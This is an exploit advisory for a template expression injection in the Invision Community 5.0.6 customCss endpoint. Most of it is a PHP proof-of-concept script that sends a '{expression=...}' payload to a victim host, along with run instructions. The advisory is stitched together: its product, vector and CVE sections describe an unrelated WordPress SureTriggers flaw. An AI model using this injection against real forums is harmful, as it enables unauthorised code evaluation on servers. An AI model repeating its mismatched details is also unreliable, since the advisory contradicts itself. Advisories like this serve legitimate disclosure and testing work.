Invision Community 5.0.6 customCss Expression Injection

Invision Community 5.0.6 customCss Expression Injection

=============================================================================================================================================
| # Title Invision Community 5.0.6 customCss Expression Injection

=============================================================================================================================================
| # Title : Invision Community 5.0.6 customCss Expression Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://invisioncommunity.com/release-notes-v5/ |
=============================================================================================================================================

[+] Summary : Expression Injection ? Server-Side Template Injection (SSTI)

A vulnerability exists in the `customCss` endpoint where the parameter
`content` is parsed using `{expression="?"}`
allowing template expressions to be evaluated.


[+] References : ( https://packetstorm.news/files/id/194569/ CVE-2025-47916 )

[+] Affected Product
- WordPress Plugin: SureTriggers
- Version: <= 1.0.78

[+] Vector
Unauthenticated REST access:
/wp-json/sure-triggers/v1/automation/action

[+] Research Notes
The endpoint accepts JSON payloads describing automation tasks.
In vulnerable versions, no authorization validation is performed
before processing the request. This POC validates reachability only.

--------------------------------------------------------------------
### SAFE PHP POC
--------------------------------------------------------------------
<?php
/*
* Invision Community 5.0.6 customCss Expression Injection ? Safe PoC
* Author: Indoushka
*/

$target = "http://victim.com"; // ? ?? ??????
$endpoint = $target . "/index.php";

// Safe Payload (No RCE)
$expr = '{expression="print(\'Indoushka\')"}';

// POST body
$data = array(
'app' => 'core',
'module' => 'system',
'controller' => 'themeeditor',
'do' => 'customCss',
'content' => $expr
);

// Send request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
curl_close($ch);

// Display server response
echo "===== Safe PoC Response =====\n";
echo $response;
?>

-------------------
### SAVE & RUN
-------------------

1. Save as:
invision_safe_poc.php

2. Run:
php invision_safe_poc.php



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================